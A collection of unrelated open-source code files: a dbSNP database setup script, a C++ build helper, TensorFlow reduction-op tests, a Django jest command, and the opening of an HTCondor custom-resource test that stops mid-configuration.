log.info(colored(pformat(context), 'blue'))
with cd(DBSNP_HOME):
force('createuser {db_user}'.format(**context))
force('createdb --owner={db_user} {db_name}'.format(**context))
for src in [DBSNP_HOME] + glob.glob(DBSNP_HOME + '/contrib/*'):
with cd(src):
run('pwd')
if glob.glob('02_drop_create_table.*'):
context.update(src=src)
run('./02_drop_create_table.sh {db_name} {db_user} {src}'.format(**context))
run('./03_import_data.sh {db_name} {db_user} {src} {src}/test/data'.format(**context))
log.info('Done')
log.info('To connect via psql, run:')
log.info('')
log.info(colored('$ psql {} -U {}'.format(args.demo_db_name, args.demo_db_user), 'blue', attrs=['bold']))
log.info('')
if __name__ == '__main__':
main()
| knmkr/dbsnp-pg | script/python/dbsnp-pg-ctl.py | Python | agpl-3.0 | 5,098 |
#!/usr/bin/env python3
import sys
import os
import mvtools_exception
import terminal_colors
import get_platform
import generic_run
import path_utils
import standard_cpp
"""
build.py
A Python template for building C++ programs
This script is supposed to be integrated similar to
the following structure:
(project)/
(project)/proj/ (project files; codelite, codeblocks, visual studio, xcode, makefiles, etc)
(project)/proj/pybuild
(project)/proj/pybuild/pybuild_cpp.py (this script)
(project)/build/ (intermediate/object files - by platform, arch and mode)
(project)/build/linux_x64_debug
(project)/build/linux_x64_release
(project)/run/ (final files/runtime folder - by platform, arch and mode)
(project)/run/linux_x64_debug
(project)/run/linux_x64_release
(project)/src
(project)/lib
(project)/lib/third_party
... and so on.
"""
def makedir_if_needed(path):
if not os.path.exists(path):
os.mkdir(path)
return True
return False
def unroll_path_dirname(path):
local_path = ""
dirname_subpath = path_utils.dirname_filtered(path)
if dirname_subpath is None:
return ""
dirname_subpath_pieces = path_utils.splitpath(dirname_subpath, "no")
for dsp in dirname_subpath_pieces:
local_path += "%s_" % dsp
return local_path
class Builder():
def __init__(self, basepath, appname, sources, options):
self.basepath = basepath
self.options = self.parseoptions(options)
self.compiler = "g++"
self.appname = appname
self.src = sources
self.src_base = "../../src/"
self.obj_base = "../../build/"
self.run_base = "../../run/"
self.include = []
self.include.append("-I%s" % self.src_base)
self.plat = get_platform.getplat()
self.arch = get_platform.getarch()
self.mode = self.options["mode"]
self.target = self.plat + "_" + self.arch + "_" + self.mode
self.obj_full = self.obj_base + self.target
self.run_full = self.run_base + self.target
self.app_full_name = self.run_full + "/" + self.appname
self.all_objs = [(unroll_path_dirname(x) + path_utils.replace_extension(path_utils.basename_filtered(x), ".cpp", ".o")) for x in self.src]
# compiler / linker flags
self.compiler_flags_common = []
self.compiler_flags_debug = []
self.compiler_flags_release = []
self.linker_flags_common = []
self.linker_flags_debug = []
self.linker_flags_release = []
# standard C++ hook - will add compiler / linker flags depending on the compiler, platform, mode, etc
self.standard_cpp_hook()
# select compiler flags to actually use
self.compiler_flags_to_use = self.compiler_flags_common
if self.mode == "debug":
self.compiler_flags_to_use += self.compiler_flags_debug
elif self.mode == "release":
self.compiler_flags_to_use += self.compiler_flags_release
# select linker flags to actually use
self.linker_flags_to_use = self.linker_flags_common
if self.mode == "debug":
self.linker_flags_to_use += self.linker_flags_debug
elif self.mode == "release":
self.linker_flags_to_use += self.linker_flags_release
def standard_cpp_hook(self):
# common compiler flags
if self.plat == get_platform.PLAT_LINUX and self.compiler == "g++":
self.compiler_flags_common += standard_cpp.get_cpp_compiler_flags_linux_gcc()
if self.plat == get_platform.PLAT_WINDOWS and self.compiler == "g++":
self.compiler_flags_common += standard_cpp.get_cpp_compiler_flags_windows_gcc()
if self.plat == get_platform.PLAT_MACOSX and self.compiler == "g++":
self.compiler_flags_common += standard_cpp.get_cpp_compiler_flags_macosx_gcc()
# debug compiler flags
if self.mode == "debug" and self.compiler == "g++":
self.compiler_flags_debug += standard_cpp.get_cpp_compiler_flags_debug_gcc()
# release compiler flags
if self.mode == "release" and self.compiler == "g++":
self.compiler_flags_release += standard_cpp.get_cpp_compiler_flags_release_gcc()
# common linker flags
self.linker_flags_common += [] # currently NOP
# debug linker flags
if self.mode == "debug" and self.compiler == "g++":
self.linker_flags_debug += standard_cpp.get_cpp_linker_flags_debug_gcc()
# release linker flags
if self.mode == "release" and self.compiler == "g++":
self.linker_flags_release += standard_cpp.get_cpp_linker_flags_release_gcc()
def parseoptions(self, options):
opts = {}
# fill in defaults
opts["mode"] = "release"
opts["target"] = "all"
# other possible options: type (static, shared)
if options is None:
return opts
if "release" in options:
opts["mode"] = "release"
if "debug" in options:
opts["mode"] = "debug"
if "clean" in options:
opts["target"] = "clean"
if "compile" in options:
opts["target"] = "compile"
if "link" in options:
opts["target"] = "link"
if "rebuild" in options:
opts["target"] = "rebuild"
if "all" in options:
opts["target"] = "all"
return opts
def run(self):
if self.options["target"] == "clean":
self.do_clean()
elif self.options["target"] == "compile":
self.do_compile()
elif self.options["target"] == "link":
self.do_link()
elif self.options["target"] == "rebuild":
self.do_rebuild()
elif self.options["target"] == "all":
self.do_all()
def do_structure(self):
makedir_if_needed(self.obj_base)
makedir_if_needed(self.run_base)
makedir_if_needed(self.obj_full)
makedir_if_needed(self.run_full)
def do_clean(self):
for o in self.all_objs:
cmd = ["rm"]
full_obj = self.obj_full + "/" + o
cmd.append(full_obj)
self.call_cmd(cmd)
cmd = ["rm", self.app_full_name]
self.call_cmd(cmd)
def do_compile(self):
for s in self.src:
cmd = [self.compiler]
if len(self.include) > 0:
for i in self.include:
cmd.append(i)
cmd += self.compiler_flags_to_use
cmd += ["-c", self.src_base + s, "-o", self.obj_full + "/" + unroll_path_dirname(s) + path_utils.replace_extension(path_utils.basename_filtered(s), ".cpp", ".o")]
self.call_cmd(cmd)
def do_link(self):
cmd = [self.compiler, "-o", self.app_full_name]
cmd += [self.obj_full + "/" + x for x in self.all_objs]
if len(self.linker_flags_to_use) > 0:
for l in self.linker_flags_to_use:
cmd.append(l)
self.call_cmd(cmd)
def do_rebuild(self):
self.do_clean()
self.do_all()
def do_all(self):
self.do_structure()
self.do_compile()
self.do_link()
def call_cmd(self, cmd):
cmd_str = ""
for c in cmd:
cmd_str += "%s " % c
cmd_str = cmd_str.rstrip()
v, r = generic_run.run_cmd_simple(cmd)
if not v:
raise mvtools_exception.mvtools_exception("%s: Failed: [%s]" % (cmd_str, r.rstrip()))
print("%s: Command succeeded." % cmd_str)
if __name__ == "__main__":
appname = "testapp"
src = ["main.cpp", "subfolder/second.cpp"]
basepath = os.path.abspath(path_utils.dirname_filtered(sys.argv[0]))
opt = None
if len(sys.argv) > 1:
opt = sys.argv[1:]
bd = Builder(basepath, appname, src, opt)
try:
bd.run()
except mvtools_exception.mvtools_exception as mvtex:
print("%s%s%s" % (terminal_colors.TTY_RED, mvtex, terminal_colors.TTY_WHITE))
sys.exit(1)
print("%s%s%s" % (terminal_colors.TTY_GREEN, "All succeeded.", terminal_colors.TTY_WHITE))
| mvendra/mvtools | codegen/templates/pybuild/pybuild_cpp.py | Python | mit | 8,224 |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for reduction ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import tensor_shape
from tensorflow.python.kernel_tests import gradient_checker
class SumReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.sum(np_ans, keepdims=keep_dims)
else:
reduction_axes = np.array(reduction_axes).astype(np.int32)
for ra in reduction_axes.ravel()[::-1]:
np_ans = np.sum(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
tf_ans = tf.reduce_sum(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
if reduction_axes is not None and np.shape(reduction_axes) == (1,):
# Test scalar reduction_axes argument
self._compareAll(x, reduction_axes[0])
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testFloatReduce1D(self):
# Create a 1D array of floats
np_arr = np.arange(1, 6).reshape([5]).astype(np.float32)
self._compareAll(np_arr, [0])
def testFloatReduce2D(self):
# Create a 2D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 10).reshape([2, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [0, 1])
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testFloatReduce4D(self):
# Create a 4D array of floats and reduce across some
# dimensions
np_arr = np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
# Need specialization for reduce(4D, [0, 2])
# self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
self._compareAll(np_arr, [1, 2, 3])
self._compareAll(np_arr, [0, 1, 2, 3])
def testFloatReduce5D(self):
# Create a 5D array of floats and reduce across some dimensions
np_arr = np.arange(0, 840).reshape([2, 3, 5, 7, 4]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
# Need specialization for reduce(4D, [0, 2])
# self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
self._compareAll(np_arr, [1, 2, 3])
self._compareAll(np_arr, [0, 1, 2, 3])
self._compareAll(np_arr, [1, 2, 3, 4])
self._compareAll(np_arr, [0, 1, 2, 3, 4])
# Simple tests for various tf.
def testDoubleReduce1D(self):
np_arr = np.arange(1, 6).reshape([5]).astype(np.float64)
self._compare(np_arr, [], False)
self._compare(np_arr, [0], False)
def testInt32Reduce1D(self):
np_arr = np.arange(1, 6).reshape([5]).astype(np.int32)
self._compare(np_arr, [], False)
self._compare(np_arr, [0], False)
def testInvalidIndex(self):
np_arr = np.arange(0, 10).reshape([2, 5]).astype(np.float32)
input_tensor = tf.convert_to_tensor(np_arr)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Invalid reduction dimension" in str(e)):
tf.reduce_sum(input_tensor, [-1])
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Invalid reduction dimension" in str(e)):
tf.reduce_sum(input_tensor, [2])
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Invalid reduction dimension" in str(e)):
tf.reduce_sum(input_tensor, [0, 2])
# Int64??
def _compareGradient(self, shape, sum_shape, reduction_axes):
if reduction_axes is not None and np.shape(reduction_axes) == (1,):
# Test scalar reduction_axes argument
self._compareGradient(shape, sum_shape, reduction_axes[0])
x = np.arange(1.0, 49.0).reshape(shape).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_sum(t, reduction_axes)
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t,
shape,
su,
sum_shape,
x_init_value=x,
delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient(self):
self._compareGradient([2, 3, 4, 2], [2, 2], [1, 2])
def testGradient2(self):
self._compareGradient([2, 3, 4, 2], [2, 4, 2], [1])
def testGradient3(self):
self._compareGradient([2, 3, 4, 2], [2, 3, 2], [2])
def testGradient4(self):
self._compareGradient([2, 3, 4, 2], [], None)
class MeanReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims):
np_sum = x
count = 1
for ra in reduction_axes[::-1]:
np_sum = np.sum(np_sum, axis=ra, keepdims=keep_dims)
count *= x.shape[ra]
np_ans = np_sum / count
with self.test_session():
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_mean(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False)
self._compare(x, reduction_axes, True)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float32)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_mean(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_mean(t, [0, 1, 2, 3])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_mean(t, [])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
class ProdReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims):
np_ans = x
if reduction_axes is None:
np_ans = np.prod(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.prod(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session():
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_prod(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False)
self._compare(x, reduction_axes, True)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
# NOTE(kearnes): divide by 20 so product is a reasonable size
x = np.arange(1.0, 49.0).reshape(s).astype(np.float32) / 20.
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_prod(t, [])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_prod(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_prod(t, [0, 1, 2, 3])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
# NOTE(kearnes): the current gradient calculation gives NaNs for 0 inputs
x = np.arange(0.0, 48.0).reshape(s).astype(np.float32) / 20.
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_prod(t, [])
jacob_t, _ = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 4, 2], x_init_value=x, delta=1)
with self.assertRaisesOpError("Tensor had NaN values"):
tf.check_numerics(jacob_t, message="_ProdGrad NaN test").op.run()
class MinReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.amin(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.amin(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_min(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient2(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t, [1])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient3(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t, [2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient4(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t)
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
class MaxReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.amax(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.amax(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_max(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient2(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t, [1])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient3(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t, [2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient4(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t)
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
class AllReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.all(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.all(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_all(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testAll3D(self):
# Create a 3D array of bools and reduce across all possible
# dimensions
np_arr = (np.random.uniform(0, 1, 30) > 0.1).reshape([2, 3, 5])
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
class AnyReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.any(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.any(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_any(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testAll3D(self):
# Create a 3D array of bools and reduce across all possible
# dimensions
np_arr = (np.random.uniform(0, 1, 30) > 0.9).reshape([2, 3, 5])
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testPartialShapes(self):
# Input shape is unknown.
c_unknown = tf.placeholder(tf.float32)
s_unknown = tf.reduce_sum(c_unknown, [1, 2])
self.assertEqual(tensor_shape.unknown_shape(), s_unknown.get_shape())
# Input shape only has known rank.
c_known_rank = tf.placeholder(tf.float32)
c_known_rank.set_shape(tensor_shape.unknown_shape(ndims=3))
s_known_rank = tf.reduce_sum(c_known_rank, [1, 2], keep_dims=True)
self.assertEqual(3, s_known_rank.get_shape().ndims)
# Reduction indices are unknown.
unknown_indices = tf.placeholder(tf.int32)
c_unknown_indices = tf.constant([[10.0], [20.0]])
s_unknown_indices = tf.reduce_sum(c_unknown_indices, unknown_indices,
keep_dims=False)
self.assertEqual(tensor_shape.unknown_shape(),
s_unknown_indices.get_shape())
s_unknown_indices_keep = tf.reduce_sum(c_unknown_indices, unknown_indices,
keep_dims=True)
self.assertEqual(2, s_unknown_indices_keep.get_shape().ndims)
if __name__ == "__main__":
tf.test.main()
| MehdiSfr/tensor-flow | tensorflow/python/kernel_tests/reduction_ops_test.py | Python | apache-2.0 | 20,753 |
from pathlib import Path
import shutil
from subprocess import call
from base.management import BaseCommand
from django.core.management import call_command
from django.conf import settings
BABEL_CONF = """
module.exports = {
presets: [
[
'@babel/preset-env',
{
targets: {
node: 'current',
},
},
],
],
}
"""
class Command(BaseCommand):
help = "Run jest unit tests."
def handle(self, *ars, **options):
call_command("transpile")
p = Path(settings.PROJECT_PATH) / ".transpile"
shutil.os.chdir(p)
conf_file = p / "babel.config.js"
if not conf_file.exists():
self.stdout.write(f'Creating "babel.config.js" at {p}.')
conf_file.write_text(BABEL_CONF)
command_array = [
p / "node_modules" / ".bin" / "jest",
"--no-cache",
"--passWithNoTests",
]
return_value = call(command_array)
if return_value > 0:
exit(return_value)
| fiduswriter/fiduswriter | fiduswriter/base/management/commands/jest.py | Python | agpl-3.0 | 1,082 |
#!/usr/bin/env pytest
#
# Test two each of two different custom machine resources in the same job,
# checking the sum and peak metrics for each. This set of tests is run
# against static slots for simplicity.
#
# Then repeat the test using partitionable slots. I've never seen the
# custom resource code fail in partitionable slots if it was working in
# static slots, so if you find a problem with partitionable slots and
# want to test the pieces individually, you'll have to change the code.
#
import pytest
import logging
import time
import htcondor
from ornithology import (
config,
standup,
action,
Condor,
format_script,
write_file,
track_quantity,
SetJobStatus,
JobStatus,
)
from libcmr import *
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
monitor_period = 5
resources = {
"SQUID": 4,
"TAKO": 4,
}
usages = {
"SQUID": [5, 1, 9, 4],
"TAKO": [500, 100, 900, 400],
}
peaks = {
"SQUID": [
[ 51, 51, 91, 11, 41, 41 ],
[ 42, 42, 92, 12, 52, 52 ],
[ 53, 53, 13, 93, 43, 43 ],
[ 44, 44, 14, 94, 54, 54 ],
],
"TAKO": [
[ 5100, 5100, 9100, 1100, 4100, 4100 ],
[ 4200, 4200, 9200, 1200, 5200, 5200 ],
[ 5300, 5300, 1300, 9300, 4300, 4300 ],
[ 4400, 4400, 1400, 9400, 5400, 5400 ],
],
}
@config(
params={
"TwoInstancesPerSlot": {
"config": {
"NUM_CPUS": "8",
"NUM_SLOTS": "2",
"NUM_SLOTS_TYPE_1": "2",
"SLOT_TYPE_1": "SQUIDs=2 TAKOs=2 CPUS=2",
"ADVERTISE_CMR_UPTIME_SECONDS": "TRUE",
"MACHINE_RESOURCE_INVENTORY_SQUIDs": "$(TEST_DIR)/SQUID-discovery.py",
"STARTD_CRON_SQUIDs_MONITOR_EXECUTABLE": "$(TEST_DIR)/SQUID-monitor.py",
"STARTD_CRON_SQUIDs_MONITOR_MODE": "periodic",
"STARTD_CRON_SQUIDs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_SQUIDs_MONITOR_METRICS": "SUM:SQUIDs, PEAK:SQUIDsMemory",
"MACHINE_RESOURCE_INVENTORY_TAKOs": "$(TEST_DIR)/TAKO-discovery.py",
"STARTD_CRON_TAKOs_MONITOR_EXECUTABLE": "$(TEST_DIR)/TAKO-monitor.py",
"STARTD_CRON_TAKOs_MONITOR_MODE": "periodic",
"STARTD_CRON_TAKOs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_TAKOs_MONITOR_METRICS": "SUM:TAKOs, PEAK:TAKOsMemory",
"STARTD_CRON_JOBLIST": "$(STARTD_CRON_JOBLIST) SQUIDs_MONITOR TAKOs_MONITOR",
},
},
"PartitionableSlots": {
"config": {
"NUM_CPUS": "8",
"NUM_SLOTS": "1",
"NUM_SLOTS_TYPE_1": "1",
"SLOT_TYPE_1": "100%",
"SLOT_TYPE_1_PARTITIONABLE": "TRUE",
"ADVERTISE_CMR_UPTIME_SECONDS": "TRUE",
"MACHINE_RESOURCE_INVENTORY_SQUIDs": "$(TEST_DIR)/SQUID-discovery.py",
